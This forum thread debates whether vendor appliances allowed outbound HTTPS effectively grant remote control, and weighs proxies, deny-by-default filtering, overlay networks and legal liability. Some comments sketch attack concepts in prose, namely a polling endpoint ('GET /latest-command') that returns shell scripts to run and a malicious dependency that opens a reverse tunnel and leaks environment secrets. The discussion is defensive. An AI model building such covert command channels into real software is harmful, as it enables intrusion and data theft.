I understand the technical issue but on a broader sense, the instant that a vendor supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor controlled endpoint, doesn't it immediately technically allows full remote control?
Lots of talk about tunneling and wrapping/disguising ssh but a vendor does not need any of that to control its machine.
For example you could have the on-prem host poll a "licensing" or "software update" server that also happens to reply with ad-hoc commands to execute on demand. Could be straight up shell commands and the result can be sent back. No need for ssh, long lived connections, reverse tunnels or anything.
The only way to mitigate this is to fully trust the vendor, have a strong legal framework to protect against wrongdoings or fully block all internet access to endpoints you don't fully control.
I understand where you are coming from and that it should be assumed a vendor box can do anything even without SSH. Other teams don't think this way however. "Oh its just outbound HTTPS, no inbound connections, totally fine" is the school of thought I was up against. Adding to this the box was expected to send hundreds of GB of logs to do "big-data" against daily to monitor it's health, thus training firewalls, IDS and humans to expect this outbound data volume, which could with the flip of a bit start exfiltrating customer data. If I told you what this box was for you would know how insane it would be to send more than 500KB per day for that purpose. It seems I share something in common with Boeing "line stoppers". There are details I wish I could share as they would drive home how insane this entire debacle was. I expect to read about it in the news some day.
This is always the problem with firewalls. If your adversary controls both ends of the connection then it's not outbound HTTPS traffic you're letting through. It's totally arbitrary two-way traffic that happens to be transmitted over a connection first established to port 443 on the remote host.
The only useful technical defence against this kind of deception today is deep packet inspection and a policy of blocking everything by default and only permitting through packets you can actively approve. But that becomes very expensive very quickly and there are practical limits on how far you can go. Ultimately if your adversary is willing to engage covertly in the kind of hacks mentioned in the article then they're probably also willing to engage in steganography to get past whatever DPI rules you can afford to run. Then you're back to square one and either you trust their device or you sandbox it.
In reality a more effective defence is probably the one involving contracts with severe penalties for this kind of behaviour and liability for any consequential losses.
This is a good point. I would expect that a device like a SAN is just sending telemetry/logs/diagnostics back to the mothership for support purposes. Having a a persistent tunnel kinda of sucks and I much prefer something like shell access being done over a remote support/screen sharing app so I can see what they are doing. Previous security fiascos like the Solarwinds hack come to mind and an attacker could have a foothold inside a trusted/internal network.
To be properly paranoid, I would allow the device to send telemetry and diagnostics, but only through my proxy. The outbound stream can be as encrypted as they want, but I will demand the ability to decode the answer, and decide whether I let it come back to the box.
I wonder how many vendors would agree to offer this, and how much more would t then cost.
(If you update software from the vendor's resource, all bets are off, because you just run their software which can do anything your security measures would not prevent it from doing. You have to very seriously trust the vendor of your OS, if you may be a high-value target.)
Nah. I’ve seen similar stunts pulled off with companies like Microsoft.
Sales teams who believe a full funnel is in front of them are capable of incredible feats. You need to have the aircover and willingness to scorch the earth.
But it's their device, you're installing it in your network - if they wanted to do something malicious, they would. If you shut down the tunneling method detailed in the article, they could just add an endpoint like:
GET /latest-command
that resolved to a shell script to be run periodically.
> start exfiltrating customer data
If it's data that they're supposed to have access to, they're already doing that. If it's data they're not supposed to have access to, the correct fix here is to DMZ the box they're installed on, not to try to (hopelessly) limit their outbound connectivity.
>fully block all internet access to endpoints you don't fully control.
Not that all risk can be eliminated, but this simplifies management while reducing the attack surface area by orders of magnitude.
The good news is companies are increasingly doing it now that technology has finally caught up - now that implementing a private* network with each vendor (or a private extranet across all vendors) is actually viable and sensible.
* Usually a software-only, zero implicit trust overlay network
All the cloud networks are software (defined network) a very long way down, far below what is exposed to customers, so any overlay is going to have to be software.
If you mean overlays that don't require an endpoint agent there are plenty of solutions that will orchestrate cloud native SDN control enforcement capabilities like AWS network ACLs or Azure NSGs rather then trying to handle enforcement on the resource directly with an agent.
I appreciate the response but I think you misunderstood my question. OP mentioned a "software-only, zero implicit trust overlay network". In my head all overlay networks are software only (and from your answer your conception too). I was trying to figure out why OP mentioned "software only"? Was it redundant or was it a useful way to distinguish between another category of overlay network.
> Are there overlay networks that are not software only?
In the defense and government security space there are 'hardware' overlay network devices. One common use is extending classified 'airgapped' networks over less secure networks or the internet. 'Inline Network Encryptor' is a generic term; 'Taclane' is one brand; HAIPE is I think an applicable NSA standard.
> I understand the technical issue but on a broader sense, the instant that a vendor supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor controlled endpoint, doesn't it immediately technically allows full remote control?
In the sense of "isn't it now possible on technical level?", yes.
On a legal level? You're breaking into their network. At least in the US, but almost certainly in many other jurisdictions), there's a very non-zero chance you're engaged in illegal activity. https://www.justice.gov/jm/jm-9-48000-computer-fraud
On a PR level? Definitely not. The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks. Even the helpdesk guys are gonna be telling their buddies over beers "you wouldn't believe what our netsec team caught our appliance from DumbassCo doing..."
That doesn't even get into the liabilities involved if the client has to meet security requirements from the government (as a contractor), PCI compliance, HIPPA compliance, SEC rules, etc. Imagine a client who needs compliance as a core part of their business because of your network appliance...
And then there's the liability if the remote access capability turns out to be a security vulnerability that can be exploited by outside parties, is abused by an employee, or hackers break into your company and jump off from there to your clients.
There is nothing difficult about respecting "no, you may not have remote access to our network or this system" with no reason or justification provided. They don't need to justify or explain it to you. It's their network. Change the support contract terms if necessary, but don't do anything the author idiotically suggests.
I see people claiming that "it should be assumed the vendor can access your network" - legally speaking, no, it sure shouldn't. That's like saying "if you buy a laptop with a camera and microphone you should assume the laptop manufacturer can spy on you."
If you work at a company that does this sort of nonsense, now would be an excellent time to deactivate any "hack our way into customer-owned equipment or networks" functionality and urgently schedule a meeting with some lawyers.
> The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks.
It wouldn't matter. People will bitch about it online for a few days and the company will make some lame PR statement about how sorry they are and that they'll take steps to prevent it from happening again but then everyone will move on to the next outrage and the company will continue to thrive.
Look at levono, they've repeatedly shipped computers with malware and backdoors, sometimes because they were being paid to, and people still buy them.
How many times have router manufacturers included the most brain dead security flaws like hard coded passwords and backdoors? How many companies have leaked private data to the world? Wells Fargo fraudulently opened accounts. HSBC laundered money for terrorists. Microsoft and Amazon were caught illegally harvesting data on children. Philips and Johnson & Johnson outright murdered people by continuing to sell products they knew were giving people cancer. Nobody went out of business. Even CrowdStrike is still around. The most universally hated companies in the US are also among the most successful.
I mean, couldn’t any semi popular, transitive dependency installed with <insert package manager here> do the same thing with a reverse tunnel? Imagine a simple go module that kicks off a background routine that just keeps a tunnel open with a direct call to os.exec. Seems like an easy way to cat env and pipe back secrets to the attacker
That's what I was thinking. Or any application at all. If MS word started doing this, how long would it take to recognise? Especially if it's only periodic and only some small percentage of their install base.
This said there are a few companies that monitor this kind of stuff in 'popular' open source packages and provide services to their customers to block packages that do things like this. Unfortunately it's pretty expensive.
Lots of talk about tunneling and wrapping/disguising ssh but a vendor does not need any of that to control its machine.
For example you could have the on-prem host poll a "licensing" or "software update" server that also happens to reply with ad-hoc commands to execute on demand. Could be straight up shell commands and the result can be sent back. No need for ssh, long lived connections, reverse tunnels or anything.
The only way to mitigate this is to fully trust the vendor, have a strong legal framework to protect against wrongdoings or fully block all internet access to endpoints you don't fully control.